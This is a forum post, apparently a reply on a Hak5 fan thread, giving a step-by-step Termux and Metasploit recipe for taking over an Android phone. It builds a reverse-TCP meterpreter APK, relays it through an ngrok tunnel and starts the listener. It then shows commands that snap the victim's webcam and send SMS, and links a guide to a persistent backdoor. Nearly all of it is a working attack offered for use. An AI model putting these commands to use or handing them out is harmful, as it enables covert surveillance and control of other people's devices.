Hi Benny!
^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!
I am interested in the same topic, and spent a lot of time this week making it all real.
Here is a summary of what I did to pwn my Android phone via my other Android phone:
1) Download Termux from the Google Play Store.
2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh
3) git clone https://github.com/rapid7/metasploit-framework
4) cd metasploit-framework
5) bundle install (takes about 5 minutes)
6) Go to
https://dashboard.ngrok.com/user/signup
and register for free port forwarding.
7) git clone https://github.com/inconshreveable/ngrok
8) cd ngrok
9) ./ngrok tokenauth (your ngrok token) one time dealio
10) ping o.tcp.ngrok.io (get the ngrok IP address)
11) ./ngrok tcp 4564
12) Open a new window session.
Slide thumb to the right. Termux offers a new session. In the new session, cd metasploit-framework.
13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk
This creates the payload in the root directory on the Android phone.
14) ./msfconsole
15) msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set lport 4564
msf> exploit -j -z
16) Run the lolz.apk payload on the other phone.
Ngrok waiting for session. Msf waiting for session.
Voila! Once it connects,
Type sessions -i 1 and see meterpreter.
Type help for commands.
Type command -h for help with a command.
webcam_snap -i 2 -p /sdcard/selfy.jpg
send_sms -d 2149711234 -t "what's up Darren :)"
Commands here:
https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699
You can make the connection persistent only as long as they are not rebooted. To make a persistent shell, see this article:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/
Manz, you're good to pwn.
I also recommend:
git clone https://github.com/Rajkumrdusad/Tool-X
200 kali tools for termux!!
I love this pr09.
Please note: the Ngrok port randomly changes, so your payload must co-align.
I haven't used Evil Droid, so maybe you know?
- คςเ๔ кɭ๏ฬภ